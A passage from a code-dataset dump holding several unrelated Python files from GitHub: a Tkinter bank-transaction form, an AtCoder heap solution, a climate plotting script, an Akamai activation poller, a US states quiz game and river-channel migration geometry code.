= Label(self.lbl_frm_ident, text=\"# de Celular\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n        self.lbl2.grid(row=fila_grid, column=1, padx=10, pady=2)\n        self.txt_celular = Entry(self.lbl_frm_ident, width=62, state=\"disabled\", textvariable=self.celular)\n        self.txt_celular.grid(row=fila_grid, column=2, padx=15, pady=2)\n        fila_grid += 1\n\n        self.lbl3 = Label(self.lbl_frm_ident, text=\"# de Cédula\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n        self.lbl3.grid(row=fila_grid, column=1, padx=10, pady=2)\n        self.txt_cedula = Entry(self.lbl_frm_ident, width=62, state=\"disabled\", textvariable=self.cedula)\n        self.txt_cedula.grid(row=fila_grid, column=2, padx=15, pady=1)\n        fila_grid += 1\n\n        # ZONA DE TRANSACCION\n        
self.labelframe = LabelFrame(self.master, text=\"Transacción\",\n font=self.lbl_fonts,\n width=60, height=100)\n self.labelframe.grid(row=fila_grid, column=0, padx=20, pady=10)\n fila_grid += 1\n\n self.lbl3_1 = Label(self.labelframe, text=\"Número de Cuenta:\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl3_1.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_numero_cta = Entry(self.labelframe, width=37, font=self.lbl_entrys, state=\"readonly\",\n textvariable=self.numero_cta)\n self.txt_numero_cta.grid(row=fila_grid, column=2, columnspan=2, padx=15, pady=2, ipady=2)\n fila_grid += 1\n\n self.lbl4 = Label(self.labelframe, text=\"Saldo Disponible\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl4.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_saldo_disp = Entry(self.labelframe, width=37,font=self.lbl_entrys,state=\"readonly\",textvariable=self.saldo_disp)\n self.txt_saldo_disp.grid(row=fila_grid, column=2,columnspan=2, padx=15, pady=2,ipady=2)\n fila_grid += 1\n\n\n\n self.transaccion=\"\"\n if self.accion==\"DEPOSITAR\":\n self.transaccion=\"Deposito en Cuenta Bancaria\"\n self.mensaje_tipo_transaccion=\"Monto a Depositar\"\n if self.accion==\"RETIRAR\":\n self.transaccion=\"Retiro de Cuenta Bancaria\"\n self.mensaje_tipo_transaccion = \"Monto a Retirar\"\n if self.accion==\"TRANSFERIR\":\n self.transaccion=\"Transferencia de Cuentas Bancarias\"\n self.mensaje_tipo_transaccion = \"Monto a Transaferir\"\n self.lbl5 = Label(self.labelframe, text=\"Tipo de Transacción: \", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl5.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_transaccion = Entry(self.labelframe, width=62, state=\"disabled\", textvariable=self.tipo_transaccion)\n self.txt_transaccion.grid(row=fila_grid, column=2, padx=15, pady=1)\n self.tipo_transaccion.set(self.transaccion)\n fila_grid += 1\n\n self.lbl6 = Label(self.labelframe, text=self.mensaje_tipo_transaccion, width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl6.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_monto_transaccion = Entry(self.labelframe, width=62, state=\"normal\")\n self.txt_monto_transaccion.grid(row=fila_grid, column=2, padx=15, pady=1)\n fila_grid += 1\n\n if self.accion == \"TRANSFERIR\":\n self.lbl7 = Label(self.labelframe, text=\"Cuenta a Transferir\", width=26, anchor=\"w\", bg=\"gray\",\n fg=\"black\")\n self.lbl7.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_cta_transferir = Entry(self.labelframe, width=62, state=\"normal\")\n self.txt_cta_transferir.grid(row=fila_grid, column=2, padx=15, pady=1)\n fila_grid += 1\n\n # zona de botones\n self.frame_botones = LabelFrame(self.master, text=\"Acciones\",\n font=self.lbl_fonts,\n width=200, height=100)\n self.frame_botones.grid(row=fila_grid, column=0, padx=20, pady=10)\n fila_grid += 1\n\n self.boton_Continuar = Button(self.frame_botones, text=\"Continuar\", width=60, height=38,\n image=self.tools.imagen_avanzar, compound=TOP,\n command=self.continuar)\n self.boton_Continuar.grid(row=fila_grid, column=2, padx=3, pady=2)\n\n self.boton_cancelar = Button(self.frame_botones, text=\"Cancelar\", width=60, height=38,\n image=self.tools.imagen_descartar, compound=TOP,\n command=self.cancelar)\n self.boton_cancelar.grid(row=fila_grid, column=3, padx=3, pady=2)\n\n clientes=Cliente()\n cuentas=Cuenta()\n lista_cta=cuentas.consulta_saldo_disponible_by_cli(self.cliente)\n lista_datos_reg = clientes.consulta_datos_registro_by_cli(self.cliente)\n\n 
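# load the account data and registration data just fetched into the Tk variables bound to the widgets\n        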
self.cta_id=lista_cta[0]\n self.numero_cta.set(lista_cta[1])\n self.saldo_disp.set(lista_cta[2])\n\n self.correo_electronico.set(lista_datos_reg[0])\n self.celular.set(lista_datos_reg[1])\n self.cedula.set(lista_datos_reg[2])\n","repo_name":"AdonisAMG/Istg","sub_path":"2G/cuentas_bancarias2/proyecto/presentacion/transacciones.py","file_name":"transacciones.py","file_ext":"py","file_size_in_byte":9242,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18332740781","text":"import sys\nimport math\nimport bisect\nfrom heapq import heapify, heappop, heappush\nfrom collections import deque, defaultdict, Counter\nfrom functools import lru_cache\nfrom itertools import accumulate, combinations, permutations\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\nMOD99 = 998244353\n\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\nSMI = lambda: input().split()\nSLI = lambda: list(SMI())\n\n\n# 削除可能heapq\nfrom heapq import *\nclass Heapq:\n '''\n Heapq() : 本体qと削除用pの2本のheapqを用意する\n build(a) : 配列aからプライオリティキューqを構築する\n push(x) : プライオリティキューにxを追加\n erase(x) : プライオリティーキューからxを(疑似的に)削除\n clean() : 削除予定でトップに来た要素をq,pからpop\n pop((exc)) : トップの要素をqからpop (qが空の場合、excを返す)\n top((exc)) : トップの要素の値を取得 (qが空の場合、excを返す)\n '''\n def __init__(self):\n self.q = []\n self.p = []\n def build(self, a):\n self.q = a\n heapify(self.q)\n def push(self, x):\n heappush(self.q, x)\n def erase(self, x):\n heappush(self.p, x)\n self.clean()\n def clean(self):\n while self.p and self.q and self.q[0]==self.p[0]:\n heappop(self.q)\n heappop(self.p)\n def pop(self, exc=None):\n self.clean()\n if self.q:\n return heappop(self.q)\n return exc\n def top(self, exc=None):\n self.clean()\n if self.q:\n return self.q[0]\n return exc\n\n\ndef main():\n N = NI()\n T = []\n\n hq1 = Heapq()\n hq2 = Heapq()\n T1 = [0] * N\n T2 = [0] * N\n\n for i in range(N):\n k, *t = NMI()\n t = deque(t)\n if len(t) > 0:\n x = t.popleft() * (-1)\n hq1.push((x, i))\n T1[i] = x\n if len(t) > 0:\n x = t.popleft() * (-1)\n hq2.push((x, i))\n T2[i] = x\n T.append(t)\n\n M = NI()\n A = NLI()\n\n # print(hq1.q)\n # print(hq2.q)\n\n for a in A:\n if a == 1:\n x, i = hq1.pop(exc=(0, 0))\n t = T2[i]\n hq2.erase((t, i))\n hq1.push((t, i))\n T1[i] = T2[i]\n if len(T[i]) > 0:\n t = T[i].popleft()\n T2[i] = t * (-1)\n hq2.push((t * (-1), i))\n else:\n T2[i] = 0\n print(-x)\n\n\n else:\n x1, i1 = hq1.pop(exc=(0, 0))\n x2, i2 = hq2.pop(exc=(0, 0))\n\n if x1 < x2:\n # x1を採用\n x, i = x1, i1\n hq2.push((x2, i2))\n t = T2[i]\n hq2.erase((t, i))\n hq1.push((t, i))\n T1[i] = T2[i]\n if len(T[i]) > 0:\n t = T[i].popleft()\n T2[i] = t * (-1)\n hq2.push((t * (-1), i))\n else:\n T2[i] = 0\n print(-x)\n\n else:\n x, i = x2, i2\n hq1.push((x1, i1))\n\n if len(T[i]) > 0:\n t = T[i].popleft()\n # print(x, i, -t)\n T2[i] = t * (-1)\n hq2.push((t*(-1), i))\n else:\n T2[i] = 0\n print(-x)\n\n # print(T1)\n # print(T2)\n # print(hq1.q)\n # print(hq2.q)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"PAST/PAST03L.py","file_name":"PAST03L.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4023952737","text":"# Load in data for steady state simulations and save average of years 11-15 in climatology folder. 
\n\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom physics import get_edge_psi\n\nintdown=True\n\nvars_90 = get_edge_psi('ss_90.000', thresh=0., intdown=intdown)\nvars_95 = get_edge_psi('ss_95.000', thresh=0., intdown=intdown)\nvars_100 = get_edge_psi('ss_100.000', thresh=0., intdown=intdown)\nvars_105 = get_edge_psi('ss_105.000', thresh=0., intdown=intdown)\nvars_110 = get_edge_psi('ss_110.000', thresh=0., intdown=intdown)\nvars_115 = get_edge_psi('ss_115.000', thresh=0., intdown=intdown)\n\nplt.plot(vars_90[0], vars_90[1], 'xk', mew=2)\nplt.plot(vars_95[0], vars_95[1], 'xk', mew=2)\nplt.plot(vars_100[0], vars_100[1], 'xk', mew=2)\nplt.plot(vars_105[0], vars_105[1], 'xk', mew=2)\nplt.plot(vars_110[0], vars_110[1], 'xk', mew=2)\nplt.plot(vars_115[0], vars_115[1], 'xk', mew=2)\nplt.show()","repo_name":"subond/python_scripts","sub_path":"steady_state_runs/regime_fig_ss.py","file_name":"regime_fig_ss.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"21613505045","text":"from __future__ import annotations\n\nimport json\nimport time\nfrom time import gmtime\nfrom time import strftime\n\nfrom exceptions import setup_logger\nfrom rich.live import Live\nfrom rich.table import Table\n\nlogger = setup_logger()\n\n\ndef generate_table(activationDict, network) -> Table:\n\n \"\"\"Make a new table.\"\"\"\n table = Table()\n table.add_column('Property Name')\n table.add_column('Property Id')\n table.add_column('Activation Id')\n table.add_column('Status')\n\n for propertyStatus in activationDict:\n try:\n activation_status = propertyStatus['activationStatus'][network]\n except:\n activation_status = '....Checking Status....'\n table.add_row(\n f\"{propertyStatus['propertyName']}\", f\"{propertyStatus['propertyId']}\", f\"{propertyStatus['activationId']}\", f'[red]{activation_status}' if activation_status != 'ACTIVE' else '[green]ACTIVE'\n )\n return table\n\n\ndef pollActivation(activationDict, wrapper_object, contract_id, group_id, network):\n start_time = time.perf_counter()\n all_properties_active = False\n elapse_time = 0\n with Live(generate_table(activationDict, network), refresh_per_second=1) as live:\n while (not all_properties_active):\n end_time = time.perf_counter()\n elapse_time = (end_time - start_time)\n for i, propertyActivation in enumerate(activationDict):\n activation_id = propertyActivation['activationId']\n property_id = propertyActivation['propertyId']\n property_name = propertyActivation['propertyName']\n activationStatus = {'STAGING': '',\n 'PRODUCTION': ''}\n if activation_id != 0:\n activation_status_response = wrapper_object.pollActivationStatus(contract_id,\n group_id,\n property_id,\n activation_id)\n if activation_status_response.status_code == 200:\n for each_activation in activation_status_response.json()['activations']['items']:\n if each_activation['activationId'] == activation_id:\n if network in each_activation['network']:\n if each_activation['status'] != 'ACTIVE':\n activationStatus[network] = 'PENDING_ACTIVATION'\n all_properties_active = False\n elif each_activation['status'] == 'ACTIVE':\n end_time = time.perf_counter()\n elapse_time = str(strftime('%H:%M:%S', gmtime(end_time - start_time)))\n # msg = f'Successfully activated property {property_name} v1 on Akamai {network} network'\n # logger.info(f'Activation Duration: {elapse_time} {msg}')\n activationStatus[network] = 'ACTIVE'\n else:\n logger.error('Unable to parse activation 
status')\n activationStatus[network] = 'UNABLE_TO_UPDATE_STATUS'\n all_properties_active = False\n else:\n logger.error(json.dumps(activation_status_response.json(), indent=4))\n logger.error(f'Unable to get activation status for {property_name}')\n activationStatus[network] = 'UNABLE_TO_UPDATE_STATUS'\n all_properties_active = False\n\n else:\n activationStatus[network] = 'ACTIVATION_ERROR'\n\n # check to see if all are active, if so - set variable to true\n activationDict[i]['activationStatus'] = activationStatus\n pending_activations = (list(filter(lambda x: x['activationStatus'][network] not in ['ACTIVE', 'ACTIVATION_ERROR'], activationDict)))\n live.update(generate_table(activationDict, network))\n if len(pending_activations) == 0:\n all_properties_active = True\n break\n logger.info('Polling 30s...')\n time.sleep(30)\n return (all_properties_active, activationDict)\n","repo_name":"akamai/cli-onboard","sub_path":"bin/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"18639917171","text":"from turtle import Screen,Turtle\nimport pandas\ndef find_state(user_answer):\n\n result = states_df[states_df[\"state\"] == str(user_answer).title()]\n if not result.empty:\n return result\n else:\n return \"\"\n\ndef write_name_on_window(found_state):\n state_writer.goto(x=float(found_state[\"x\"]), y=float(found_state[\"y\"]))\n state_writer.write(arg=result[\"state\"].values[0], move=True, align=\"center\")\ndef create_new_file_and_delete_exist_info():\n\n with open(\"answered_state.txt\",\"w\") as answered_state:\n answered_state.write(\"\")\ncreate_new_file_and_delete_exist_info()\nscreen = Screen()\nmap = Turtle()\nstate_writer = Turtle()\nscreen.addshape(\"blank_states_img.gif\")\nmap.shape(\"blank_states_img.gif\")\n\nstates_df = pandas.read_csv(\"50_states.csv\")\nnumber_state = 0\nanswered_state = []\nwhile(number_state<=55):\n user_answer = screen.textinput(\"state_name\",\"What's another state name?\")\n if user_answer == \"exit\":\n break\n result = find_state(user_answer)\n if(str(result)!=\"\"):\n if(user_answer.title() not in answered_state):\n answered_state.append(user_answer.title())\n write_name_on_window(result)\n\nprint(f\"You have answered {len(answered_state)} out of 55 states\")\nwith open(\"answered_state.txt\",mode=\"w\") as file:\n for state in answered_state:\n file.write(f\"{state}\\n\")\n\n","repo_name":"supawichza40/100DaysCoding-Python","sub_path":"day_25/us-states-game-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20451174961","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom scipy.signal import medfilt, savgol_filter\nimport scipy.interpolate\nfrom scipy.spatial import distance\nfrom librosa.sequence import dtw # only need the 'dtw' function from the librosa library\nimport pandas as pd\nimport shapefile\nfrom shapely.geometry.polygon import LinearRing, orient\nfrom shapely.geometry import Polygon, MultiPolygon, Point, MultiLineString, LineString\nfrom shapely.ops import snap, polygonize, unary_union\nfrom descartes import PolygonPatch\nfrom tqdm.notebook import tqdm, trange\nimport itertools\nimport datetime\n\ndef resample_and_smooth(x,y,delta_s,smoothing_factor):\n dx = np.diff(x); dy = np.diff(y) 
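# first derivatives of the coordinates, used below to compute the arc length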
\n ds = np.sqrt(dx**2+dy**2)\n tck, u = scipy.interpolate.splprep([x,y],s=smoothing_factor) # parametric spline representation of curve\n unew = np.linspace(0,1,1+int(sum(ds)/delta_s)) # vector for resampling\n out = scipy.interpolate.splev(unew,tck) # resampling\n xs = out[0]\n ys = out[1]\n return xs, ys\n\ndef correlate_curves(x1, x2, y1, y2):\n # use dynamic time warping to correlate two 2D curves\n X = np.vstack((x1,y1))\n Y = np.vstack((x2,y2))\n sm = distance.cdist(X.T, Y.T) # similarity matrix\n D, wp = dtw(C=sm) # dynamic time warping\n p = wp[:,0] # correlation indices for first curve\n q = wp[:,1] # correlation indices for second curve\n return p,q,sm\n\ndef compute_curvature(x,y):\n dx = np.gradient(x); dy = np.gradient(y) \n ds = np.sqrt(dx**2+dy**2)\n ddx = np.gradient(dx); ddy = np.gradient(dy) # second derivatives \n curvature = (dx*ddy - dy*ddx) / ((dx**2 + dy**2)**1.5)\n s = np.cumsum(ds)\n return curvature, s\n\ndef convert_string_to_date(string):\n year = int(string[:4])\n month = int(string[4:6])\n day = int(string[6:])\n date = datetime.datetime(year, month, day)\n return date\n\ndef get_migr_rate(x1, x2, y1, y2, years):\n p, q, sm = correlate_curves(x1, x2, y1, y2)\n p = p[::-1] # p and q need to be flipped!\n q = q[::-1]\n qn = np.delete(np.array(q),np.where(np.diff(p)==0)[0]+1)\n pn = np.delete(np.array(p),np.where(np.diff(p)==0)[0]+1)\n xa = x1[:-1]\n xb = x1[1:]\n ya = y1[:-1]\n yb = y1[1:]\n x = x2[qn][1:]\n y = y2[qn][1:]\n migr_sign = np.sign((x-xa) * (yb-ya) - (y-ya) * (xb-xa))\n migr_sign = np.hstack((migr_sign[0], migr_sign))\n migr_dist = migr_sign * sm[pn, qn] / years\n return migr_dist, migr_sign, p, q\n\ndef find_zero_crossings(curve, s, x, y):\n n_curv = abs(np.diff(np.sign(curve)))\n n_curv[n_curv==2] = 1\n loc_zero_curv = np.where(n_curv)[0]\n loc_zero_curv = loc_zero_curv +1\n if loc_zero_curv[-1] != len(s)-1:\n loc_zero_curv = np.hstack((0,loc_zero_curv,len(s)-1))\n else:\n loc_zero_curv = np.hstack((0,loc_zero_curv))\n n_infl = len(loc_zero_curv)\n max_curv = np.zeros(n_infl-1)\n loc_max_curv = np.zeros(n_infl-1, dtype=int)\n for i in range(1, n_infl):\n if np.mean(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])>0:\n max_curv[i-1] = np.max(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])\n if np.mean(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])<0:\n max_curv[i-1] = np.min(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])\n max_local_ind = np.where(curve[loc_zero_curv[i-1]:loc_zero_curv[i]]==max_curv[i-1])[0]\n if len(max_local_ind)>1:\n loc_max_curv[i-1] = loc_zero_curv[i-1] + max_local_ind[0]\n elif len(max_local_ind)==1:\n loc_max_curv[i-1] = loc_zero_curv[i-1] + max_local_ind\n else:\n loc_max_curv[i-1] = 0\n # find interpolated zero crossing locations:\n zero_crossings = []\n for i in loc_zero_curv[1:-1]:\n x1 = s[i-1]\n x2 = s[i]\n y1 = curve[i-1]\n y2 = curve[i]\n a = (y2 - y1) / (x2 - x1)\n b = (y1*x2 - y2*x1) / (x2 - x1)\n zero_crossings.append(-b/a)\n zero_x = []\n zero_y = []\n count = 0\n for i in loc_zero_curv[1:-1]:\n x1 = x[i]\n y1 = y[i]\n x2 = x[i+1]\n y2 = y[i+1]\n s1 = s[i]\n s2 = s[i+1]\n s0 = zero_crossings[count]\n x0 = x1 + (x2 - x1)*(s0 - s1)/(s2 - s1)\n y0 = y1 + (y2 - y1)*(s0 - s1)/(s2 - s1)\n zero_x.append(x0)\n zero_y.append(y0)\n count += 1\n return loc_zero_curv, loc_max_curv, zero_crossings, zero_x, zero_y\n\ndef create_bars(dates, cutoff_area, dirname, ax):\n # function for creating polygons for 'scroll' bars and plotting them\n bars = [] # these are 'scroll' bars - shapely MultiPolygon objects that correspond to one time step\n 
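# erosional areas between consecutive channel positions, one entry per time step\n    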
erosions = []\n chs = [] # list of channels - shapely Polygon objects\n jumps = [] # gaps between channel polygons that are not cutoffs\n all_chs = [] # list of merged channels (to be used for erosion)\n cutoffs = []\n cmap = mpl.cm.get_cmap('viridis')\n print('create channels and cutoffs...')\n for i in trange(len(dates)-1):\n ch1 = create_channel_polygon_from_shapefile(dirname,dates[i])\n ch2 = create_channel_polygon_from_shapefile(dirname,dates[i+1])\n ch1, bar, erosion, jump, cutoff = one_step_difference_no_plot(ch1,ch2,cutoff_area)\n chs.append(ch1)\n erosions.append(erosion)\n jumps.append(jump)\n cutoffs.append(cutoff)\n chs.append(ch2) # append last channel\n print('create list of merged channels...')\n for i in trange(len(dates)-1): # create list of merged channels\n if i == 0: \n all_ch = chs[len(dates)-1]\n else:\n all_ch = all_ch.union(chs[len(dates)-i-1])\n all_chs.append(all_ch)\n print('create bars...')\n for i in trange(len(dates)-1): # create scroll bars\n bar = chs[i].difference(all_chs[len(dates)-i-2]) # scroll bar defined by difference\n bars.append(bar)\n color = cmap(i/float(len(dates)-1))\n for b in bar: # plotting\n if MultiPolygon(cutoffs[i]).is_valid: # sometimes this is invalid\n if not b.intersects(MultiPolygon(cutoffs[i])):\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n else:\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n return bars, erosions, chs, all_chs, jumps, cutoffs\n\ndef create_channel_polygon_from_shapefile(dirname, date):\n # function for reading channel bank shapefiles and creating a polygon\n filename1 = dirname+'/lb_'+date[:4]\n filename2 = dirname+'/rb_'+date[:4]\n sf1 = shapefile.Reader(filename1).shapes()\n lb1 = np.array(sf1[0].points)\n sf2 = shapefile.Reader(filename2).shapes()\n rb1 = np.array(sf2[0].points)\n coords = []\n xm = np.hstack((lb1[:,0],rb1[::-1,0]))\n ym = np.hstack((lb1[:,1],rb1[::-1,1]))\n for i in range(len(xm)):\n coords.append((xm[i],ym[i]))\n ch = Polygon(LinearRing(coords))\n if not ch.is_valid:\n ch = ch.buffer(0)\n return ch\n\ndef create_channel_polygon(lbx,lby,rbx,rby):\n # function for creating a channel polygon\n coords = []\n xm = np.hstack((lbx,rbx[::-1]))\n ym = np.hstack((lby,rby[::-1]))\n for i in range(len(xm)):\n coords.append((xm[i],ym[i]))\n ch = Polygon(LinearRing(coords))\n return ch\n\ndef one_step_difference_no_plot(ch1, ch2, cutoff_area):\n both_channels = ch1.union(ch2) # union of the two channels\n outline = Polygon(LinearRing(list(both_channels.exterior.coords))) # outline of the union\n jump = outline.difference(both_channels) # gaps between the channels\n bar = ch1.difference(ch2) # the (point) bars are the difference between ch1 and ch2\n bar = bar.union(jump) # add gaps to bars\n erosion = ch2.difference(ch1) # erosion is the difference between ch2 and ch1\n bar_no_cutoff = list(bar.geoms) # create list of bars (cutoffs will be removed later)\n erosion_no_cutoff = list(erosion.geoms) # create list of eroded areas (cutoffs will be removed later)\n if type(jump)==MultiPolygon: # create list of gap polygons (if there is more than one gap)\n jump_no_cutoff = list(jump.geoms)\n else:\n jump_no_cutoff = jump\n cutoffs = []\n for b in bar.geoms:\n if b.area>cutoff_area:\n bar_no_cutoff.remove(b) # remove cutoff from list of bars\n for e in erosion.geoms: # remove 'fake' erosion related to cutoffs\n if b.intersects(e): # if bar intersects erosional area\n if type(b.intersection(e))==MultiLineString:\n erosion_no_cutoff.remove(e)\n # deal with gaps between channels:\n 
if type(jump)==MultiPolygon:\n for j in jump.geoms:\n if b.intersects(j):\n if (type(j.intersection(b))==Polygon) & (j.area>0.3*cutoff_area):\n jump_no_cutoff.remove(j) # remove cutoff-related gap from list of gaps\n cutoffs.append(b.symmetric_difference(b.intersection(j))) # collect cutoff\n if type(jump)==Polygon:\n if b.intersects(jump):\n if type(jump.intersection(b))==Polygon:\n jump_no_cutoff = []\n cutoffs.append(b.symmetric_difference(b.intersection(jump))) # collect cutoff\n bar = MultiPolygon(bar_no_cutoff)\n erosion = MultiPolygon(erosion_no_cutoff)\n if type(jump_no_cutoff)==list:\n jump = MultiPolygon(jump_no_cutoff)\n ch1 = ch1.union(jump)\n eps = 0.1 # this is needed to get rid of 'sliver geometries' - \n ch1 = ch1.buffer(eps, 1, join_style=2).buffer(-eps, 1, join_style=2)\n return ch1, bar, erosion, jump, cutoffs\n\ndef compute_s_coord(x,y): \n dx = np.diff(x); dy = np.diff(y) \n ds = np.sqrt(dx**2+dy**2)\n s = np.hstack((0,np.cumsum(ds)))\n return dx, dy, ds, s\n\n\ndef create_channel_segment_polygons(x, y, rbx, rby, lbx, lby, lbw, rbw, deltas, extra_width):\n x1 = x.copy()\n y1 = y.copy()\n x2 = x.copy()\n y2 = y.copy()\n dx,dy,ds,s = compute_s_coord(x,y)\n\n # x1,x2,y1,y2 are coordinates of points that are extra_width * deltas m beyond the channel banks on both sides:\n x1[1:-1] = x[1:-1] - (lbw[1:-1]+extra_width)*(dy[1:]+dy[:-1])/deltas # left bank\n y1[1:-1] = y[1:-1] + (lbw[1:-1]+extra_width)*(dx[1:]+dx[:-1])/deltas # left bank\n x2[1:-1] = x[1:-1] + (rbw[1:-1]+extra_width)*(dy[1:]+dy[:-1])/deltas # right bank\n y2[1:-1] = y[1:-1] - (rbw[1:-1]+extra_width)*(dx[1:]+dx[:-1])/deltas # right bank\n x1[0] = x[0] - (lbw[0]+extra_width)*dy[0]/deltas # first point\n y1[0] = y[0] + (lbw[0]+extra_width)*dx[0]/deltas\n x2[0] = x[0] + (rbw[0]+extra_width)*dy[0]/deltas\n y2[0] = y[0] - (rbw[0]+extra_width)*dx[0]/deltas \n x1[-1] = x[-1] - (lbw[-1]+extra_width)*dy[-1]/deltas # last point\n y1[-1] = y[-1] + (lbw[-1]+extra_width)*dx[-1]/deltas\n x2[-1] = x[-1] + (rbw[-1]+extra_width)*dy[-1]/deltas\n y2[-1] = y[-1] - (rbw[-1]+extra_width)*dx[-1]/deltas\n\n polys = []\n cline = LineString(np.vstack((x,y)).T) # create linestring from centerline\n for i in trange(0,len(x1)-1):\n # create polygon:\n poly = Polygon(LinearRing([[x2[i],y2[i]],[x2[i+1],y2[i+1]],[x1[i+1],y1[i+1]],[x1[i],y1[i]]]))\n if not poly.is_valid: # if there are no self-intersections, the polygon is already 'fixed'\n fixed_polys = get_rid_of_self_intersections(poly) # otherwise remove self intersections\n fixed_polys1 = [] # 'fixed_polys' is a generator, but we need a list\n for fpoly in fixed_polys:\n fixed_polys1.append(fpoly)\n # select the polygon that intersects the centerline, get rid of the other one:\n if (fixed_polys1[0].intersects(cline)) and (not fixed_polys1[1].intersects(cline)):\n poly = fixed_polys1[0]\n if (not fixed_polys1[0].intersects(cline)) and (fixed_polys1[1].intersects(cline)): \n poly = fixed_polys1[1]\n # if both polygons intersect the centerline:\n if (fixed_polys1[0].intersects(cline)) and (fixed_polys1[1].intersects(cline)):\n if fixed_polys1[0].intersects(prev_poly):\n poly = fixed_polys1[0]\n else:\n poly = fixed_polys1[1]\n # if fixed_polys1[0].area > fixed_polys1[1].area:\n # poly = fixed_polys1[0]\n # else:\n # poly = fixed_polys1[1]\n prev_poly = poly # store current polygon\n polys.append(poly)\n\n # create channel polygon:\n coords = []\n xm = np.hstack((lbx,rbx[::-1]))\n ym = np.hstack((lby,rby[::-1]))\n for i in range(len(xm)):\n coords.append((xm[i],ym[i]))\n ch = 
Polygon(LinearRing(coords))\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x,y)\n ax.plot(rbx,rby,'k')\n ax.plot(lbx,lby,'k')\n # plot all polygons:\n for poly in polys:\n ax.add_patch(PolygonPatch(poly,facecolor='none',edgecolor='k'))\n plt.axis('equal')\n return polys\n\ndef estimate_half_widths(x, y, rbx, lbx, rby, lby):\n # do the corelation (this will take a few seconds):\n pr,qr,smr = correlate_curves(x,rbx,y,rby)\n pl,ql,sml = correlate_curves(x,lbx,y,lby)\n pnr = np.delete(np.array(pr),np.where(np.diff(pr)==0)[0]+1)\n qnr = np.delete(np.array(qr),np.where(np.diff(pr)==0)[0]+1)\n pnl = np.delete(np.array(pl),np.where(np.diff(pl)==0)[0]+1)\n qnl = np.delete(np.array(ql),np.where(np.diff(pl)==0)[0]+1)\n # find left- and right-widths:\n rbw = smr[pnr,qnr]\n lbw = sml[pnl,qnl]\n # rbw and lbw are flipped relative to the centerline, so they need to be inverted:\n rbw = rbw[::-1]\n lbw = lbw[::-1]\n # plotting for QC:\n plt.figure()\n plt.plot(rbx,rby,'k')\n plt.plot(lbx,lby,'k')\n plt.plot(x,y,'r')\n for i in range(len(pnr)):\n plt.plot([x[pnr[i]], rbx[qnr[i]]], [y[pnr[i]], rby[qnr[i]]], 'b', linewidth = 0.5 )\n for i in range(len(pnl)):\n plt.plot([x[pnl[i]], lbx[qnl[i]]], [y[pnl[i]], lby[qnl[i]]], 'r', linewidth = 0.5 )\n plt.axis('equal');\n return rbw, lbw, pnr, qnr, pnl, qnl\n\ndef crop_polygons_to_channel_width(polys, ch):\n cropped_polys = [] # list for polygons that are cropped to the actual channel width\n for poly in tqdm(polys):\n cropped_polys.append(poly.intersection(ch)) # cropping\n\n # remove objects that are not polygons or multipolygons: \n polys_to_be_removed = []\n # ind = 0 \n for poly in cropped_polys: \n if (type(poly)!=Polygon) & (type(poly)!=MultiPolygon):\n polys_to_be_removed.append(poly)\n if poly.area<1.0:\n polys_to_be_removed.append(poly) \n # ind += 1\n cropped_polys = [poly for poly in cropped_polys if poly not in polys_to_be_removed]\n\n\n # remove unnecessary small bits that are in multipolygons:\n for i in range(len(cropped_polys)):\n if type(cropped_polys[i])==MultiPolygon:\n polys_temp = list(cropped_polys[i])\n if polys_temp[0].area>=polys_temp[1].area:\n cropped_polys[i] = polys_temp[0]\n else:\n cropped_polys[i] = polys_temp[1]\n\n # for poly in cropped_polys:\n # if poly.area<1.0:\n # cropped_polys.remove(poly)\n return cropped_polys\n\ndef find_overlapping_polys(polys,crit_area):\n \"\"\"function for finding overlapping polygons\"\"\"\n inds = []\n ind = 0\n pbar = tqdm(total = len(polys)/5)\n while ind<len(polys)-50: # look at 50 consecutive polygons at a time (otherwise it takes a long time)\n for ind1,ind2 in itertools.combinations(np.arange(ind,ind+50), 2):\n geom1 = polys[ind1]\n geom2 = polys[ind2]\n if geom1.intersection(geom2).area>crit_area:\n inds.append(ind1)\n inds.append(ind2)\n ind = ind+5\n pbar.update(1)\n inds = np.array(inds)\n inds = np.unique(inds)\n return inds\n\ndef repolygonize_bend(cropped_polys, cropped_polys_new, i1, i2, pad, crit_dist, new_poly_inds, x, y):\n \"\"\"function for generating new, non-overlapping polygons in sharp bends\n 